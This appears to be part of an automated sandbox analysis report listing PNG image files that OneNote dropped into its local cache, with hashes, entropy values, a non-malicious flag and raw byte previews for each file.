Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
